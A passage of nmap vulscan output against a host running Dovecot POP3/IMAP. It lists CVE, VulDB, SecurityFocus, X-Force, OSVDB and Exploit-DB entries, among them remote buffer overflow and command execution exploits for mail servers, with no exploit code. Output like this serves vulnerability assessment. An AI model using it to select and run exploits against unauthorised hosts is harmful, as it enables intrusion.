9339| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
9340| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
9341| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
9342| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
9343|
9344| SecurityFocus - https://www.securityfocus.com/bid/:
9345| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
9346| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
9347| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
9348| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
9349| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
9350| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
9351| [67306] Dovecot Denial of Service Vulnerability
9352| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
9353| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
9354| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
9355| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
9356| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
9357| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
9358| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
9359| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
9360| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
9361| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
9362| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
9363| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
9364| [39838] tpop3d Remote Denial of Service Vulnerability
9365| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
9366| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
9367| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
9368| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
9369| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
9370| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
9371| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
9372| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
9373| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
9374| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
9375| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
9376| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
9377| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
9378| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
9379| [17961] Dovecot Remote Information Disclosure Vulnerability
9380| [16672] Dovecot Double Free Denial of Service Vulnerability
9381| [8495] akpop3d User Name SQL Injection Vulnerability
9382| [8473] Vpop3d Remote Denial Of Service Vulnerability
9383| [3990] ZPop3D Bad Login Logging Failure Vulnerability
9384| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
9385|
9386| IBM X-Force - https://exchange.xforce.ibmcloud.com:
9387| [86382] Dovecot POP3 Service denial of service
9388| [84396] Dovecot IMAP APPEND denial of service
9389| [80453] Dovecot mail-search.c denial of service
9390| [71354] Dovecot SSL Common Name (CN) weak security
9391| [67675] Dovecot script-login security bypass
9392| [67674] Dovecot script-login directory traversal
9393| [67589] Dovecot header name denial of service
9394| [63267] Apple Mac OS X Dovecot information disclosure
9395| [62340] Dovecot mailbox security bypass
9396| [62339] Dovecot IMAP or POP3 denial of service
9397| [62256] Dovecot mailbox security bypass
9398| [62255] Dovecot ACL entry security bypass
9399| [60639] Dovecot ACL plugin weak security
9400| [57267] Apple Mac OS X Dovecot Kerberos security bypass
9401| [56763] Dovecot header denial of service
9402| [54363] Dovecot base_dir privilege escalation
9403| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
9404| [46323] Dovecot dovecot.conf information disclosure
9405| [46227] Dovecot message parsing denial of service
9406| [45669] Dovecot ACL mailbox security bypass
9407| [45667] Dovecot ACL plugin rights security bypass
9408| [41085] Dovecot TAB characters authentication bypass
9409| [41009] Dovecot mail_extra_groups option unauthorized access
9410| [39342] Dovecot LDAP auth cache configuration security bypass
9411| [35767] Dovecot ACL plugin security bypass
9412| [34082] Dovecot mbox-storage.c directory traversal
9413| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
9414| [26578] Cyrus IMAP pop3d buffer overflow
9415| [26536] Dovecot IMAP LIST information disclosure
9416| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
9417| [24709] Dovecot APPEND command denial of service
9418| [13018] akpop3d authentication code SQL injection
9419| [7345] Slackware Linux imapd and ipop3d core dump
9420| [6269] imap, ipop2d and ipop3d buffer overflows
9421| [5923] Linuxconf vpop3d symbolic link
9422| [4918] IPOP3D, Buffer overflow attack
9423| [1560] IPOP3D, user login successful
9424| [1559] IPOP3D user login to remote host successful
9425| [1525] IPOP3D, user logout
9426| [1524] IPOP3D, user auto-logout
9427| [1523] IPOP3D, user login failure
9428| [1522] IPOP3D, brute force attack
9429| [1521] IPOP3D, user kiss of death logout
9430| [418] pop3d mktemp creates insecure temporary files
9431|
9432| Exploit-DB - https://www.exploit-db.com:
9433| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
9434| [23053] Vpop3d Remote Denial of Service Vulnerability
9435| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
9436| [11893] tPop3d 1.5.3 DoS
9437| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
9438| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
9439| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
9440| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
9441|
9442| OpenVAS (Nessus) - http://www.openvas.org:
9443| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
9444| [901025] Dovecot Version Detection
9445| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
9446| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
9447| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
9448| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
9449| [870607] RedHat Update for dovecot RHSA-2011:0600-01
9450| [870471] RedHat Update for dovecot RHSA-2011:1187-01
9451| [870153] RedHat Update for dovecot RHSA-2008:0297-02
9452| [863272] Fedora Update for dovecot FEDORA-2011-7612
9453| [863115] Fedora Update for dovecot FEDORA-2011-7258
9454| [861525] Fedora Update for dovecot FEDORA-2007-664
9455| [861394] Fedora Update for dovecot FEDORA-2007-493
9456| [861333] Fedora Update for dovecot FEDORA-2007-1485
9457| [860845] Fedora Update for dovecot FEDORA-2008-9202
9458| [860663] Fedora Update for dovecot FEDORA-2008-2475
9459| [860169] Fedora Update for dovecot FEDORA-2008-2464
9460| [860089] Fedora Update for dovecot FEDORA-2008-9232
9461| [840950] Ubuntu Update for dovecot USN-1295-1
9462| [840668] Ubuntu Update for dovecot USN-1143-1
9463| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
9464| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
9465| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
9466| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
9467| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
9468| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
9469| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
9470| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
9471| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
9472| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
9473| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
9474| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
9475| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
9476| [70259] FreeBSD Ports: dovecot
9477| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
9478| [66522] FreeBSD Ports: dovecot
9479| [65010] Ubuntu USN-838-1 (dovecot)
9480| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
9481| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
9482| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
9483| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
9484| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
9485| [62854] FreeBSD Ports: dovecot-managesieve
9486| [61916] FreeBSD Ports: dovecot
9487| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
9488| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
9489| [60528] FreeBSD Ports: dovecot
9490| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
9491| [60089] FreeBSD Ports: dovecot
9492| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
9493| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
9494|
9495| SecurityTracker - https://www.securitytracker.com:
9496| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
9497| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
9498| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
9499|
9500| OSVDB - http://www.osvdb.org:
9501| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
9502| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
9503| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
9504| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
9505| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
9506| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
9507| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
9508| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
9509| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
9510| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
9511| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
9512| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
9513| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
9514| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
9515| [66113] Dovecot Mail Root Directory Creation Permission Weakness
9516| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
9517| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
9518| [66110] Dovecot Multiple Unspecified Buffer Overflows
9519| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
9520| [64783] Dovecot E-mail Message Header Unspecified DoS
9521| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
9522| [62796] Dovecot mbox Format Email Header Handling DoS
9523| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
9524| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
9525| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
9526| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
9527| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
9528| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
9529| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
9530| [43137] Dovecot mail_extra_groups Symlink File Manipulation
9531| [42979] Dovecot passdbs Argument Injection Authentication Bypass
9532| [39876] Dovecot LDAP Auth Cache Security Bypass
9533| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
9534| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
9535| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
9536| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
9537| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
9538| [23281] Dovecot imap/pop3-login dovecot-auth DoS
9539| [23280] Dovecot Malformed APPEND Command DoS
9540| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
9541| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
9542| [5857] Linux pop3d Arbitrary Mail File Access
9543| [2471] akpop3d username SQL Injection
9544|_
9545143/tcp open imap Dovecot imapd
9546| vulscan: VulDB - https://vuldb.com:
9547| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
9548| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
9549| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
9550| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
9551| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
9552| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
9553| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
9554| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
9555| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
9556| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
9557| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
9558| [69835] Dovecot 2.2.0/2.2.1 denial of service
9559| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
9560| [65684] Dovecot up to 2.2.6 unknown vulnerability
9561| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
9562| [63692] Dovecot up to 2.0.15 spoofing
9563| [7062] Dovecot 2.1.10 mail-search.c denial of service
9564| [59792] Cyrus IMAPd 2.4.11 weak authentication
9565| [57517] Dovecot up to 2.0.12 Login directory traversal
9566| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
9567| [57515] Dovecot up to 2.0.12 Crash denial of service
9568| [54944] Dovecot up to 1.2.14 denial of service
9569| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
9570| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
9571| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
9572| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
9573| [53277] Dovecot up to 1.2.10 denial of service
9574| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
9575| [45256] Dovecot up to 1.1.5 directory traversal
9576| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
9577| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
9578| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
9579| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
9580| [40356] Dovecot 1.0.9 Cache unknown vulnerability
9581| [38222] Dovecot 1.0.2 directory traversal
9582| [37927] Ipswitch Ipswitch Collaboration Suite up to 2006.1 IMAP Service imapd32.exe memory corruption
9583| [36376] Dovecot up to 1.0.x directory traversal
9584| [35759] Atrium MERCUR IMAPD IMAP4 mcrimap4.exe memory corruption
9585| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
9586|
9587| MITRE CVE - https://cve.mitre.org:
9588| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
9589| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
9590| [CVE-2011-3481] The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted References header in an e-mail message.
9591| [CVE-2011-3372] imap/nntpd.c in the NNTP server (nntpd) for Cyrus IMAPd 2.4.x before 2.4.12 allows remote attackers to bypass authentication by sending an AUTHINFO USER command without sending an additional AUTHINFO PASS command.
9592| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
9593| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
9594| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
9595| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
9596| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
9597| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
9598| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
9599| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
9600| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
9601| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
9602| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
9603| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
9604| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
9605| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
9606| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
9607| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
9608| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
9609| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
9610| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
9611| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
9612| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
9613| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
9614| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
9615| [CVE-2007-5740] The format string protection mechanism in IMAPD for Perdition Mail Retrieval Proxy 1.17 and earlier allows remote attackers to execute arbitrary code via an IMAP tag with a null byte followed by a format string specifier, which is not counted by the mechanism.
9616| [CVE-2007-5018] Stack-based buffer overflow in IMAPD in Mercury/32 4.52 allows remote authenticated users to execute arbitrary code via a long argument in a SEARCH ON command. NOTE: this issue might overlap with CVE-2004-1211.
9617| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
9618| [CVE-2007-3925] Multiple buffer overflows in the IMAP service (imapd32.exe) in Ipswitch IMail Server 2006 before 2006.21 allow remote authenticated users to execute arbitrary code via the (1) Search or (2) Search Charset command.
9619| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
9620| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
9621| [CVE-2007-1579] Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.
9622| [CVE-2007-1578] Multiple integer signedness errors in the NTLM implementation in Atrium MERCUR IMAPD (mcrimap4.exe) 5.00.14, with SP4, allow remote attackers to execute arbitrary code via a long NTLMSSP argument that triggers a stack-based buffer overflow.
9623| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
9624| [CVE-2006-6762] The IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to cause a denial of service via an APPEND command with a single "(" (parenthesis) in the argument.
9625| [CVE-2006-6761] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via a long argument to the SUBSCRIBE command.
9626| [CVE-2006-6425] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via unspecified vectors involving the APPEND command.
9627| [CVE-2006-6424] Multiple buffer overflows in Novell NetMail before 3.52e FTF2 allow remote attackers to execute arbitrary code (1) by appending literals to certain IMAP verbs when specifying command continuation requests to IMAPD, resulting in a heap overflow
9628| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
9629| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
9630| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
9631| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
9632| [CVE-2005-2278] Stack-based buffer overflow in the IMAP daemon (imapd) in MailEnable Professional 1.54 allows remote authenticated users to execute arbitrary code via the status command with a long mailbox name.
9633| [CVE-2005-1256] Stack-based buffer overflow in the IMAP daemon (IMAPD32.EXE) in IMail 8.13 in Ipswitch Collaboration Suite (ICS), and other versions before IMail Server 8.2 Hotfix 2, allows remote authenticated users to execute arbitrary code via a STATUS command with a long mailbox name.
9634| [CVE-2005-1249] The IMAP daemon (IMAPD32.EXE) in Ipswitch Collaboration Suite (ICS) allows remote attackers to cause a denial of service (CPU consumption) via an LSUB command with a large number of null characters, which causes an infinite loop.
9635| [CVE-2005-1015] Buffer overflow in MailEnable Imapd (MEIMAP.exe) allows remote attackers to execute arbitrary code via a long LOGIN command.
9636| [CVE-2005-0546] Multiple buffer overflows in Cyrus IMAPd before 2.2.11 may allow attackers to execute arbitrary code via (1) an off-by-one error in the imapd annotate extension, (2) an off-by-one error in "cached header handling," (3) a stack-based buffer overflow in fetchnews, or (4) a stack-based buffer overflow in imapd.
9637| [CVE-2003-1322] Multiple stack-based buffer overflows in Atrium MERCUR IMAPD in MERCUR Mailserver before 4.2.15.0 allow remote attackers to execute arbitrary code via a long (1) EXAMINE, (2) DELETE, (3) SUBSCRIBE, (4) RENAME, (5) UNSUBSCRIBE, (6) LIST, (7) LSUB, (8) STATUS, (9) LOGIN, (10) CREATE, or (11) SELECT command.
9638| [CVE-2002-1782] The default configuration of University of Washington IMAP daemon (wu-imapd), when running on a system that does not allow shell access, allows a local user with a valid IMAP account to read arbitrary files as that user.
9639| [CVE-2002-1604] Multiple buffer overflows in HP Tru64 UNIX allow local and possibly remote attackers to execute arbitrary code via a long NLSPATH environment variable to (1) csh, (2) dtsession, (3) dxsysinfo, (4) imapd, (5) inc, (6) uucp, (7) uux, (8) rdist, or (9) deliver.
9640| [CVE-2002-0997] Buffer overflows in IMAP Agent (imapd) for Novell NetMail (NIMS) 3.0.3 before 3.0.3A allows remote attackers to cause a denial of service.
9641| [CVE-2002-0379] Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.
9642| [CVE-2001-0691] Buffer overflows in Washington University imapd 2000a through 2000c could allow local users without shell access to execute code as themselves in certain configurations.
9643| [CVE-2000-0284] Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.
9644| [CVE-1999-1557] Buffer overflow in the login functions in IMAP server (imapd) in Ipswitch IMail 5.0 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long user name or (2) a long password.
9645| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
9646| [CVE-1999-1224] IMAP 4.1 BETA, and possibly other versions, does not properly handle the SIGABRT (abort) signal, which allows local users to crash the server (imapd) via certain sequences of commands, which causes a core dump that may contain sensitive password information.
9647|
9648| SecurityFocus - https://www.securityfocus.com/bid/:
9649| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
9650| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
